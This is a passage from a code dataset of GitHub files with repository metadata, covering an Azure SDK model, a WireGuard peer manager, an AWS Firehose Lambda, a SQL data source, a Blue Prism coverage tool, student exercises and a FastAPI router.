Known\n values are: \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :paramtype last_modified_by_type: str or ~azure.mgmt.hybridkubernetes.models.LastModifiedByType\n :keyword last_modified_at: The timestamp of resource modification (UTC).\n :paramtype last_modified_at: ~datetime.datetime\n \"\"\"\n super().__init__(**kwargs)\n self.created_by = created_by\n self.created_by_type = created_by_type\n self.created_at = created_at\n self.last_modified_by = last_modified_by\n self.last_modified_by_type = last_modified_by_type\n self.last_modified_at = last_modified_at\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/hybridkubernetes/azure-mgmt-hybridkubernetes/azure/mgmt/hybridkubernetes/models/_models_py3.py","file_name":"_models_py3.py","file_ext":"py","file_size_in_byte":29248,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"9781715705","text":"\"\"\"Provides utilities to manage the wireguard VPN\"\"\"\nimport re\nimport subprocess\n\nimport wireguard\nimport boto3\nimport werkzeug.utils as wutils\n\nimport config\nfrom app import dynamodb\n\nConfig = config.WireGuardConfig\nconfig_files = [\"wg0.conf\",\"wg0-peers.conf\"]\n\ndef add_peer(peer_name,id):\n \"\"\"add peer to config\"\"\"\n server = wireguard.Server(\n description=Config.SERVER_DESCRIPTION,\n subnet=Config.SERVER_SUBNET,\n address=Config.SERVER_ADDRESS,\n private_key=Config.PRIVATE_KEY\n )\n peer = server.peer(\n description=f\"{peer_name}#{id}\"\n )\n server.config().write(config_path=Config.TEMP_CONFIG_PATH)\n with open(\n f'{Config.TEMP_CONFIG_PATH}/wg0.conf',\n \"r+\",\n encoding=\"UTF-8\") as temp_config:\n content = temp_config.read()\n content = re.sub(\n r\"%i .*wg0-peers.conf$\",\n f'%i {Config.PRODUCTION_CONFIG_PATH}/wg0-peers.conf;' \\\n 'iptables -A FORWARD -i %i -j ACCEPT;' \\\n 'iptables -A FORWARD -o %i -j ACCEPT;' \\\n f\"iptables -t nat -A POSTROUTING -o {Config.NET_INTERFACE} -j MASQUERADE\",\n content)\n content += \\\n '\\nPostDown = iptables -D FORWARD -i %i -j ACCEPT;' \\\n 'iptables -D FORWARD -o %i -j ACCEPT;' \\\n f'iptables -t nat -D POSTROUTING -o {Config.NET_INTERFACE} -j MASQUERADE'\n with open(\n f'{Config.PRODUCTION_CONFIG_PATH}/wg0.conf',\n \"w\",\n encoding=\"UTF-8\") as production_config:\n production_config.write(content)\n\n with open(\n f\"{Config.PRODUCTION_CONFIG_PATH}/wg0-peers.conf\",\n \"a+\",\n encoding=\"UTF-8\") as production_config:\n content = production_config.read()\n content += server.config().peers\n production_config.write(content)\n\n dynamodb.add_peer(\n id=id,\n peer_name=peer_name,\n public_key=peer.public_key,\n allowed_ips=str(peer.allowed_ips))\n local_config = re.sub(r\"ListenPort = \\d+\",\"\",peer.config().local_config)\n local_config = re.sub(\n r\"AllowedIPs = \\d+\\.\\d+\\.\\d+\\.\\d+\\/\\d{1,2}\\n\",\n f\"AllowedIPs = {Config.ALLOWED_IPS}\\n\",\n local_config)\n local_config = local_config.replace(\"[Interface]\\n\",f\"[Interface]\\nDNS = {Config.DNS}\\n\")\n local_config += f\"Endpoint = {Config.ENDPOINT}\\n\"\n local_config += f'PersistentKeepalive = {Config.KEEPALIVE}'\n filename = wutils.secure_filename(f'{peer_name}.conf')\n save_config()\n subprocess.Popen(\n '/bin/bash -c \"wg syncconf wg0 <(wg-quick strip wg0 && wg-quick strip wg0-peers)\"',\n shell=True)\n return filename,local_config\n\ndef remove_peer(peer_name,id):\n \"\"\"Revoke a peer in the peers configuration file and database\"\"\"\n with open(\n f\"{Config.PRODUCTION_CONFIG_PATH}/wg0-peers.conf\",\n 
\"r+\",\n encoding=\"UTF-8\") as production_config:\n content = production_config.read()\n remove_regex = r\"\\[Peer\\]\\nAllowedIPs = \\d+\\.\\d+\\.\\d+\\.\\d+\\/\\d{1,2}\\n# \" + \\\n re.escape(f\"{peer_name}#{id}\") + \\\n r\"\\nPublicKey = .*=\"\n content = re.sub(remove_regex,\"\",content)\n content = re.sub(r'^\\n',\"\",content)\n production_config.truncate(0)\n production_config.seek(0)\n production_config.write(content)\n dynamodb.remove_peer(peer_name=peer_name,id=id)\n save_config()\n subprocess.Popen(\n '/bin/bash -c \"wg syncconf wg0 <(wg-quick strip wg0 && wg-quick strip wg0-peers)\"',\n shell=True)\n\ndef save_config():\n \"\"\"Save the wireguard configuration files to AWS S3\"\"\"\n s3 = boto3.client(\"s3\")\n for file in config_files:\n s3.upload_file(\n Filename=f\"{Config.PRODUCTION_CONFIG_PATH}/{file}\",\n Bucket=\"vpnenrollment\",\n Key=f\"config/{file}\"\n )\ndef retrieve_config():\n \"\"\"Retrieve the wireguard configuration files from AWS S3\"\"\"\n s3 = boto3.client(\"s3\")\n for file in config_files:\n s3.download_file(\n Bucket=\"vpnenrollment\",\n Key=f\"config/{file}\",\n Filename=f\"{Config.PRODUCTION_CONFIG_PATH}/{file}\"\n )\n ","repo_name":"Inner-daydream/vpn-enrollment","sub_path":"app/wireguard_management.py","file_name":"wireguard_management.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26437681853","text":"# ENTRADAS\ntempMax = 0\ntempMin = 0\n\n# SALIDAS\ntotalDias = 0\ntotalDiasError = 0\ndiasErrorBajas = 0\ndiasErrorAltas = 0\ndiasErrorAmbas = 0\ntempBajas = 0\ntempAltas = 0\ntempBajasAltas = 0\ntotalTempMediaMinima = 0\ntotalTempMediaMaxima = 0 \ncontadorTempMediaMinima = 0\ntempMediaMaxima = 0\ncontadorTempMediaMaxima = 0\n\nwhile (True):\n tempMax = int (input (\"temp Maxima: \"))\n tempMin = int (input (\"temp Minima: \"))\n #tempMax = int (input ())\n #tempMin = int (input ())\n if (tempMin==0 and tempMax==0):\n break\n totalDias = 1 + totalDias\n \n if (tempMin < 5 and tempMax > 35):\n tempBajas += 1 \n tempAltas += 1 \n #diasErrorBajas += 1 \n #diasErrorAltas += 1 \n diasErrorAmbas += 1 \n totalDiasError +=1\n elif (tempMin < 5):\n tempBajas += 1 \n diasErrorBajas += 1 \n totalDiasError +=1\n elif (tempMax > 35):\n tempAltas += 1 \n diasErrorAltas += 1 \n totalDiasError +=1\n else:\n totalTempMediaMinima = tempMin + totalTempMediaMinima\n contadorTempMediaMinima = 1 + contadorTempMediaMinima\n totalTempMediaMaxima = tempMax + totalTempMediaMaxima\n contadorTempMediaMaxima = 1 + contadorTempMediaMaxima\n#\nprint (totalDias)\nprint (totalDiasError)\nprint (diasErrorBajas)\nprint (diasErrorAltas)\nprint (diasErrorAmbas)\n\ntempMediaMinima = totalTempMediaMinima / contadorTempMediaMinima\ntempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMinima\nprint (tempMediaMaxima)\nporcentajeDiasErrores = totalDiasError/totalDias * 100\nprint (tempMediaMinima)\ntempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMaxima\nprint (porcentajeDiasErrores)\n\n#print(\"\")\n#print (\"Total dias: \", totalDias)\n#print (\"Total dias error: \", totalDiasError)\n#print (\"Total dias error bajas temp: \", diasErrorBajas)\n#print (\"Total dias error altas temp: \", diasErrorAltas)\n#print (\"Total dias error ambas: \", diasErrorAmbas)\n#\n#tempMediaMinima = totalTempMediaMinima / contadorTempMediaMinima\n#tempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMinima\n#print (\"Temp media maxima: \", tempMediaMaxima)\n#porcentajeDiasErrores = 
totalDiasError/totalDias * 100\n#print (\"Temp media minima: \", tempMediaMinima)\n#tempMediaMaxima = totalTempMediaMaxima / contadorTempMediaMaxima\n\n\n \n \n \n \n \n\n","repo_name":"lgarreta/lgcursos","sub_path":"MinTIC2021/ciclo01-python/Retos/Reto3-Semana4/reto3-ciclos.py","file_name":"reto3-ciclos.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1016880576","text":"import argparse\nimport os\n\n\ndef strip_gfa_sequence(gfa_path):\n output_path = '.'.join(gfa_path.split('.')[:-1]) + \"_no-sequence.gfa\"\n\n print(output_path)\n\n with open(gfa_path, 'r') as file, open(output_path, 'w') as output_file:\n for line in file:\n if line.startswith(\"S\"):\n line = line.split()\n line[2] = ''\n line = '\\t'.join(line) + '\\n'\n\n output_file.write(line)\n\n else:\n output_file.write(line)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\",\n required=True,\n type=str\n )\n\n args = parser.parse_args()\n\n strip_gfa_sequence(args.i)\n","repo_name":"rlorigro/GFAse","sub_path":"scripts/strip_gfa_sequence.py","file_name":"strip_gfa_sequence.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"6873249921","text":"import base64\nimport json\nimport boto3\nfrom datetime import datetime\nimport time\nimport os\nimport random\n\nprint('Loading function')\n\n# DDB Table name\nTABLE_NAME = os.environ['TABLE_NAME']\n\n# DDB Batch Size Max\nDDB_BATCH_SIZE = 100\n\n# cache timeout in seconds\nCACHE_TIMEOUT = 15*60 # 15 minutes\n\n# default encoding of bytes in the posted record\nENCODING = 'utf-8'\n\nclass Cache:\n def __init__(self, age):\n self.age = age\n self.store = {}\n\n def get(self, key):\n if key in self.store:\n v = self.store[key]\n exp = v['expiry']\n now = time.time()\n if(now < exp):\n return v['data']\n else:\n self.store.pop(key)\n return None\n\n def put(self, key, data):\n exp = time.time() + self.age\n self.store[key] = {\n 'expiry' : exp,\n 'data' : data\n }\n\nclass Database:\n def __init__(self, ddb):\n self.ddb = ddb\n self.cache = Cache(CACHE_TIMEOUT)\n\n\n def queryDDB(self, device_id_list, response):\n attempt = 0\n # loop with delay until MAX_ATTEMPTS or we have no more unprocessed records\n while(attempt < MAX_ATTEMPTS):\n unprocessed = []\n self.batchQueryDDB(device_id_list, response, unprocessed)\n if(len(unprocessed) == 0):\n break\n else:\n delay = expBackoffFullJitter(attempt)\n time.sleep(delay)\n attempt += 1\n device_id_list = unprocessed\n\n def batchQueryDDB(self, device_id_list, response, unprocessed):\n print(\"Querying details for {} devices from DynamoDB\".format(len(device_id_list)))\n\n for i in range(0, len(device_id_list), DDB_BATCH_SIZE):\n keys = []\n j = i\n while j < len(device_id_list) and j < (i + DDB_BATCH_SIZE):\n device_id = device_id_list[j]\n j += 1\n keys.append({\n 'device_id' : device_id\n })\n\n\n result = self.ddb.batch_get_item(\n RequestItems = {\n TABLE_NAME : {\n 'Keys' : keys\n }\n }\n )\n\n for r in result['Responses'][TABLE_NAME]:\n device_id = r['device_id']\n\n device_details = {\n 'manufacturer' : r['manufacturer'],\n 'model' : r['model']\n }\n\n self.cache.put(device_id, device_details)\n response[device_id] = device_details\n\n unproc_count = 0\n if TABLE_NAME in result['UnprocessedKeys']:\n unproc = result['UnprocessedKeys'][TABLE_NAME][\"Keys\"]\n unproc_count = 
len(unproc)\n for u in unproc:\n unprocessed.append(u['device_id'])\n\n print(\"DDB Query: {} results, {} unprocessed out of {} keys\".format(\n len(result['Responses'][TABLE_NAME]),\n unproc_count,\n len(keys)))\n\n def getDeviceDetails(self, device_id_set):\n response = {}\n query_device_ids = []\n\n for device_id in device_id_set:\n device_details = self.cache.get(device_id)\n if(device_details is None):\n query_device_ids.append(device_id)\n else:\n response[device_id] = device_details\n\n if len(query_device_ids) > 0:\n self.queryDDB(query_device_ids, response)\n return response\n\n# Exponential Backoff Retry with \"Full Jitter\" from:\n# https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/\nBASE = 2 # seconds\nCAP = 10 # seconds\nMAX_ATTEMPTS = 5 # retry 5 times max\n\ndef expBackoffFullJitter(attempt):\n return random.uniform(0, min(CAP, pow(2, attempt)*BASE))\n\nddb = boto3.resource('dynamodb')\ndatabase = Database(ddb)\n\ndef lambda_handler(event, context):\n source_records = []\n query_devices = set()\n\n print(\"Received batch of {} records\".format(len(event['records'])))\n\n for record in event['records']:\n payload = base64.b64decode(record['data']).decode(ENCODING)\n\n event = json.loads(payload)\n\n source_records.append({\n 'recordId' : record['recordId'],\n 'event' : dict(event) # copy of event\n })\n\n query_devices.add(event['device_id'])\n\n device_details = database.getDeviceDetails(query_devices)\n\n output = []\n successes = 0\n\n for record in source_records:\n event = record['event']\n device_id = event['device_id']\n\n if(device_id in device_details):\n # we have device details\n details = device_details[device_id]\n\n # copy existing event\n trans_event = dict(event)\n\n # enrich event with device details\n trans_event['manufacturer'] = details['manufacturer']\n trans_event['model'] = details['model']\n\n trans_payload = json.dumps(trans_event) + \"\\n\"\n\n output_record = {\n 'recordId': record['recordId'],\n 'result': 'Ok',\n 'data': base64.b64encode(trans_payload.encode(ENCODING)).decode(ENCODING)\n }\n successes += 1\n output.append(output_record)\n else:\n # we couldn't get device details: flag that as an error to firehose\n print(\"ProcessingFailed: couldn't find device \" + str(device_id))\n output_record = {\n 'recordId': record['recordId'],\n 'result': 'ProcessingFailed',\n 'data': None\n }\n output.append(output_record)\n\n print('Successfully processed {} out of {} records.'.format(successes, len(source_records)))\n return {'records': output}\n","repo_name":"aws-samples/serverless-stream-processing-at-scale","sub_path":"Source_Code/FirehoseTransform.py","file_name":"FirehoseTransform.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"70395356003","text":"from talk import talk\nfrom if_online import online\nimport datetime\nfrom take_command import take_command\n\ntalk(\"What should i write, sir\")\nif online == True:\n note = take_command()\nelse:\n note = input(\"Message: \")\nfile = open('jarvis.txt', 'w')\ntalk(\"Sir, Should i include date and time\")\nif online == True:\n snfm = take_command()\nelse:\n print(\"Should I include date and time?\")\n snfm = input(\"'yes' or 'no'\")\nif 'yes' in snfm or 'sure' in snfm:\n strTime = datetime.datetime.now().strftime('%I:%M %p')\n file.write(strTime)\n file.write(\" :- \")\n file.write(note)\n talk(\"Message saved\")\nelse:\n file.write(note)\n talk(\"Message 
saved\")","repo_name":"Maaz-319/Python","sub_path":"Jarvis_ver.1.13/py/Features/Note.py","file_name":"Note.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34188378791","text":"from gensim.models.keyedvectors import KeyedVectors\nimport gensim\nimport pandas as pn\nfrom nltk import word_tokenize\nimport numpy as np\n# import sys\n# sys.path.append('C:/Users/Juani/chatbot/')\nimport preprocesamiento\n\nclass embeddings():\n def __init__(self,wordvectors,correctedData,tipoEmbed):\n self.tipoEmbed = tipoEmbed\n\n def train(self):\n vec_embeddings=[]\n for i in range(correctedData.shape[0]):\n words = word_tokenize(correctedData[i][1])\n # print(words)\n vec_sentence = []\n for w in words:\n s = wordvectors.get_vector(w)\n if type(s)!=int:\n # print(\"Encontró \",w)\n vec_sentence.append(s)\n prom = np.mean(vec_sentence, axis=0)\n if self.tipoEmbed==1:\n vec_embeddings.append(vec_sentence)\n elif self.tipoEmbed ==2:\n vec_embeddings.append(prom)\n else:\n vec_sentence.append(prom)\n vec_embeddings.append(vec_sentence)\n return(vec_embeddings)\n\n\nif __name__=='__main__':\n print(\"-----------------Cargando los vectores----------------\")\n wordvectors_file_vec = 'C:/Users/Juani/chatbot/fasttext-sbwc.3.6.e20.vec'\n cantidad = 100000\n wordvectors = KeyedVectors.load_word2vec_format(wordvectors_file_vec, limit=cantidad)\n print(\"Listo!\")\n print(\"-----------------Cargando las preguntas---------------\")\n dataset = pn.read_csv(\"pregTest.csv\",header=None,delimiter=',')\n correctedData = preprocesamiento.preprocesar(dataset.values,1) #Dataset lematizado\n print(\"Listo. Las preguntas son: \")\n print(correctedData)\n print(\"------------------Creando embeddings------------------\")\n embed = embeddings(wordvectors,correctedData,1)\n embeddedWords = embed.train()\n print(\"Listo! Embeddings creados correctamente! 
Por ejemplo, el primero es:\")\n print(embeddedWords[0])","repo_name":"lucianozablocki/chatbot","sub_path":"ia_models/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35331324949","text":"import pyodbc\nimport xml.dom.minidom\nimport configparser\n\n# only works with trusted connection and below SQL\n\ncp = configparser.ConfigParser()\ncp.readfp(open('ConfigFile.properties'))\nprint(cp['properties']['driver'])\nprint(cp['properties']['server'])\n\ndriver = cp['properties']['driver']\nserver = cp['properties']['server']\ndatabase = cp['properties']['database']\ntrusted = \"yes\"\ntestcoveragesql = cp['properties']['testcoveragesql']\noutputFolderLocation = cp['properties']['newreleaseoutputFolderLocation']\n\n\n\ndef getDBConn():\n print('starting DB connection')\n connString = \"Driver={\" + driver + \"};Server=\" + server + \";Database=\" + database + \";Trusted_Connection=\" + trusted + \";\"\n print(\"conn String used :\" + connString)\n conn = pyodbc.connect(connString)\n print('Connection established')\n return conn\n\n\ndef getRowsFromDB(sessionid):\n conn = getDBConn()\n print('opening cursor')\n cursor = conn.cursor()\n print('executing select command')\n print('SQL used :' + testcoveragesql)\n cursor.execute(testcoveragesql, sessionid)\n results = []\n columns = [column[0] for column in cursor.description]\n # print(columns)\n for row in cursor.fetchall():\n results.append(dict(zip(columns, row)))\n # print (results)\n conn.close()\n return results\n\n\ndef readxml(releasefilelocation):\n with open(releasefilelocation, \"r\") as f:\n xmlstring = f.read()\n # print (xmlstring)\n splitting = xmlstring.split('<', 1)\n # print(splitting[1])\n return \"<\" + splitting[1]\n\n\ndef updateXML(releaseXml, stagidsDB):\n stagidlist = []\n doc1 = xml.dom.minidom.parseString(releaseXml)\n # remove existing font formatting\n fontnodes = doc1.getElementsByTagName(\"font\")\n for node in fontnodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # add new font for stageids covered in testing\n\n formatelement = doc1.createElement(\"font\")\n formatelement.setAttribute(\"family\", \"Segoe UI\")\n formatelement.setAttribute(\"size\", \"10\")\n formatelement.setAttribute(\"style\", \"Regular\")\n formatelement.setAttribute(\"color\", \"339966\")\n\n stages = doc1.getElementsByTagName(\"stage\")\n\n print(\"Stageid db: \", stagidsDB)\n for stageidelement in stages:\n stageid = stageidelement.getAttribute(\"stageid\")\n print(\"stageid present in release:\" , stageid)\n\n if stageid in stagidsDB:\n stageidelement.appendChild(formatelement.cloneNode(True))\n print(\"stageid found:\" , stageid)\n #print(doc1.toxml())\n return doc1\n\n#function called by web service to generate new formatted release\ndef generaterelease(sessionid, releasefilelocation, newreleasefilename):\n # get stageids from session log run\n results = getRowsFromDB(sessionid)\n stagidsDB = []\n for row in results:\n stagidsDB.append(str(row['stageid']).lower())\n\n # read release file\n releasefilexml = readxml(releasefilelocation)\n # add formatting to release file for stageids which have run\n newreleasefile = updateXML(releasefilexml, stagidsDB)\n\n with open(outputFolderLocation + \"/\"+ newreleasefilename, \"w\") as fs:\n fs.write(newreleasefile.toxml())\n fs.close()\n return outputFolderLocation + \"/\" + newreleasefilename\n\n\ndef main():\n\n releasefilelocation = 
\"C:/Users/AEasow/PycharmProjects/TestCoverage/release/Registration Process.bprelease\"\n sessionid = 'b39881dd-af3f-4efa-a3bb-26fe8e939b35'\n # get stageids from session log run\n\n results = getRowsFromDB(sessionid)\n stagidsDB = []\n for row in results:\n stagidsDB.append(str(row['stageid']).lower())\n\n # read release file\n releasefilexml = readxml(releasefilelocation)\n # add formatting to release file for stageids which have run\n newreleasefile = updateXML(releasefilexml, stagidsDB)\n\n with open(outputFolderLocation + \"/testcoverage.bprelease\", \"w\") as fs:\n fs.write(newreleasefile.toxml())\n fs.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ashz30/BluePrism-Automated-Testing","sub_path":"Python Web Service/GenerateTestCoverageRelease.py","file_name":"GenerateTestCoverageRelease.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44453695919","text":"from tgt_grease.enterprise.Model import BaseSourceClass\nfrom tgt_grease.core import Configuration, GreaseContainer\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\nimport datetime\nimport fnmatch\nimport json\nimport os\n\n\nclass SQLSource(BaseSourceClass):\n \"\"\"Source data from a SQL Database\n\n This Source is designed to query a SQL Server for data. A generic configuration looks like this for a\n sql_source::\n\n {\n 'name': 'example_source', # <-- A name\n 'job': 'example_job', # <-- Any job you want to run\n 'exe_env': 'general', # <-- Selected execution environment; Can be anything!\n 'source': 'sql_source', # <-- This source\n 'type': 'postgresql', # <-- SQL Server Type (Only supports PostgreSQL Currently)\n 'dsn': 'SQL_SERVER_CONNECTION', # <-- String representing the Environment variable used to connect with\n 'query': 'select count(*) as order_total from orders where oDate::DATE = current_data', # <-- SQL Query to execute on server\n 'hour': 16, # <-- **OPTIONAL** 24hr time hour to poll SQL\n 'minute': 30, # <-- **OPTIONAL** Minute to poll SQL\n 'logic': {} # <-- Whatever logic your heart desires\n }\n\n Note:\n This configuration is an example\n Note:\n Currently We only support PostreSQL Server\n Note:\n without `minute` parameter the engine will poll for the entire hour\n Note:\n **Hour and minute parameters are in UTC time**\n Note:\n To only poll once an hour only set the **minute** field\n\n \"\"\"\n\n def parse_source(self, configuration):\n \"\"\"This will Query the SQL Server to find data\n\n Args:\n configuration (dict): Configuration of Source. See Class Documentation above for more info\n\n Returns:\n bool: If True data will be scheduled for ingestion after deduplication. 
If False the engine will bail out\n\n \"\"\"\n ioc = GreaseContainer()\n if configuration.get('hour'):\n if datetime.datetime.utcnow().hour != int(configuration.get('hour')):\n # it is not the correct hour\n return True\n if configuration.get('minute'):\n if datetime.datetime.utcnow().minute != int(configuration.get('minute')):\n # it is not the correct hour\n return True\n if configuration.get('type') != 'postgresql':\n ioc.getLogger().error(\"Unsupported SQL Server Type; Currently Only supporting PostgreSQL\", notify=False)\n return False\n else:\n # Attempt to get the DSN for the connection\n if os.environ.get(configuration.get('dsn')) and configuration.get('query'):\n # ensure the DSN is setup and the query is present\n try:\n DSN = os.environ.get(configuration.get('dsn'))\n with psycopg2.connect(DSN) as conn:\n with conn.cursor(cursor_factory=RealDictCursor) as cursor:\n cursor.execute(configuration.get('query'))\n data = cursor.fetchall()\n for row in data:\n self._data.append(row)\n del ioc\n return True\n except Exception as e:\n # Naked except to prevent issues around connections\n ioc.getLogger().error(\"Error processing configuration; Error [{0}]\".format(e.message), notify=False)\n del ioc\n return False\n else:\n # could not get the DSN\n ioc.getLogger().error(\"Failed to locate the DSN variable\", notify=False)\n del ioc\n return False\n\n def mock_data(self, configuration):\n \"\"\"Data from this source is mocked utilizing the GREASE Filesystem\n\n Mock data for this source can be place in `/etc/*.mock.sql.json`. This source will pick up all these\n files and load them into the returning object. The data in these files should reflect what you expect to return\n from SQL::\n\n {\n 'column expected': 'value expected'\n ...\n }\n\n Args:\n configuration (dict): Configuration Data for source\n\n Note:\n Argument **configuration** is not honored here\n Note:\n A mock file should represent a single row\n\n Returns:\n list[dict]: Mocked Data\n\n \"\"\"\n intermediate = list()\n matches = []\n conf = Configuration()\n for root, dirnames, filenames in os.walk(conf.greaseDir + 'etc'):\n for filename in fnmatch.filter(filenames, '*.mock.sql.json'):\n matches.append(os.path.join(root, filename))\n for doc in matches:\n with open(doc) as current_file:\n content = current_file.read().replace('\\r\\n', '')\n try:\n intermediate.append(json.loads(content))\n except ValueError:\n continue\n return intermediate\n","repo_name":"target/grease","sub_path":"tgt_grease/enterprise/Sources/SQLSearch.py","file_name":"SQLSearch.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"54"} +{"seq_id":"35107565305","text":"#!/usr/bin/env python3\n\n#BoBoBo#\n\ndef rank(num, scores, find):\n r = num\n for i in range(num):\n if scores[i] <= find:\n r-=1\n\n print(r + 1)\n\n\nwhile True:\n num = input()\n if '-1' == num:\n break\n scores = input().split(' ')\n scores = list(map(lambda s : int(s), scores))\n find = input()\n rank(int(num), scores, int(find))\n","repo_name":"hellohellocode/ProgramKit","sub_path":"hellokit/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12216278625","text":"import re\n\n\n# set with all visible trees\n# each element is a tuple with (row_idx, column_idx)\ntrees = {}\n\n\ndef update_tree(row_idx, col_idx, score):\n key = row_idx, col_idx\n if key in trees:\n 
trees[key] *= score\n else:\n trees[key] = score\n\n\ndef get_scores(arr):\n scores = [0]*len(arr)\n for i, h in enumerate(arr):\n # determine idx of sub array arr[:i] which has the highest height\n # but of at least h\n argmax_i = 0\n for j, hj in enumerate(arr[:i]):\n if hj >= h:\n argmax_i = j\n # print(f'i: {i}, argmax_i: {argmax_i}')\n scores[i] = i - argmax_i\n return scores\n\n\nif __name__ == \"__main__\":\n\n with open('../../days_inputs/day-08.txt', 'r') as f:\n\n rows = []\n columns = []\n\n row_idx = 0\n\n while True:\n line = f.readline()\n line_stripped = line.rstrip()\n if line_stripped == '':\n break\n\n r = [int(i) for i in re.findall(r'\\d', line_stripped)]\n rows.append(r)\n\n if len(columns) == 0:\n columns = [[] for _ in range(len(r))]\n\n for i, h in enumerate(r):\n columns[i].append(h)\n\n # add scores of trees for left to right\n scores = get_scores(r)\n # print(f'LR scores: {scores}')\n for col_idx, score in enumerate(scores):\n update_tree(row_idx, col_idx, score)\n\n r_copy = r.copy()\n r_copy.reverse()\n scores = get_scores(r_copy)\n # print(f'RL scores: {scores}')\n for rev_col_idx, score in enumerate(scores):\n col_idx = (len(r) - 1) - rev_col_idx\n update_tree(row_idx, col_idx, score)\n\n row_idx += 1\n\n for col_idx, col in enumerate(columns):\n scores = get_scores(col)\n for row_idx, score in enumerate(scores):\n update_tree(row_idx, col_idx, score)\n\n # count visible trees right to left\n c_copy = col.copy()\n c_copy.reverse()\n scores = get_scores(c_copy)\n for rev_row_idx, score in enumerate(scores):\n row_idx = (len(col) - 1) - rev_row_idx\n update_tree(row_idx, col_idx, score)\n\n # print(trees[(3, 2)])\n # part 2 solution: 230112\n print(max(list(trees.values())))\n","repo_name":"pedrodeoliveira/advent-of-code","sub_path":"2022/python/day-08/day8-part2.py","file_name":"day8-part2.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2447479063","text":"from flask import Flask, render_template, redirect, session, request\nfrom flask_app import app\nfrom flask_app.models.author import Author\nfrom flask_app.models.book import Book\n\n\n@app.route('/')\ndef root():\n return redirect('new/author')\n\n##### NEW AUTHOR TEMPLATE PAGE #####\n@app.route('/new/author')\ndef new_author():\n all_authors = Author.get_all_auths()\n return render_template('new_author.html', auths=all_authors)\n\n##### POST: ADD NEW AUTHOR #####\n@app.route('/add/author', methods=[\"POST\"])\ndef add_new_author():\n\n data = {\n 'name': request.form['auth_name']\n }\n Author.add_author(data)\n return redirect('/')\n\n##### AUTHOR FAVORITE PAGE #####\n@app.route('/author/favorites')\ndef author_favorites():\n books = Book.get_all_books()\n return render_template('author_favorites.html', books=books)\n\n@app.route('/author/favorites/')\ndef show_auth_favorites(auth_id):\n author = Author.get_single_auth({'id': auth_id})\n faves = author.get_auth_favorites({'id': auth_id})\n fave_ids = []\n for book in faves:\n fave_ids.append(book['id'])\n books = Book.get_all_books()\n return render_template('author_favorites.html', auth=author, all_books=books, faves=faves, fave_ids=fave_ids)\n\n##### ADD BOOK TO AUTHOR'S FAVORITES #####\n@app.route('/add/author/favorite/', methods=[\"POST\"])\ndef add_author_favorite(auth_id):\n author = Author.get_single_auth({'id':auth_id})\n data = {\n 'author_id': auth_id,\n 'book_id': request.form['book_id']\n }\n author.add_auth_favorite(data)\n return 
redirect(f'/author/favorites/{auth_id}')\n\n\n########### ADDED DELETE AUTHOR METHOD BUT ONLY WORKS FOR AUTHS WITHOUT\n# RELATIONSHIPS TO OTHER TABLES\n# DIDN'T HAVE TIME TO FINISH OUT THE FUNCTIONALITY\n# STUDYING TO ACE THE EXAM\n\n@app.route('/delete/author/', methods=[\"POST\"])\ndef delete_author(auth_id):\n data = {\n 'id': auth_id\n }\n Author.delete_author(data)\n return redirect('/')","repo_name":"reidroberts24/Python-Fundamentals","sub_path":"Books/flask_app/controllers/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26772266682","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Project : AI. @by PyCharm\n# @File : base\n# @Time : 2023/5/26 10:39\n# @Author : betterme\n# @WeChat : meutils\n# @Software : PyCharm\n# @Description :\n\nfrom meutils.pipe import *\nfrom fastapi import APIRouter, Body, Depends, HTTPException\n\nrouter = APIRouter()\n\n\n@router.get(\"/\")\ndef read_root():\n return {\"Hi, baby.\": \"https://github.com/yuanjie-ai/ChatLLM\"}\n\n\n@router.get(\"/gpu\")\ndef gpu_info():\n return os.popen(\"nvidia-smi\").read()\n\n\n@router.get(\"/v1/models\")\ndef get_models():\n ret = {\"data\": [], \"object\": \"list\"}\n ret['data'].append({\n \"created\": 1677610602,\n \"id\": \"gpt-3.5-turbo\",\n \"object\": \"model\",\n \"owned_by\": \"openai\",\n \"permission\": [\n {\n \"created\": 1680818747,\n \"id\": \"modelperm-fTUZTbzFp7uLLTeMSo9ks6oT\",\n \"object\": \"model_permission\",\n \"allow_create_engine\": False,\n \"allow_sampling\": True,\n \"allow_logprobs\": True,\n 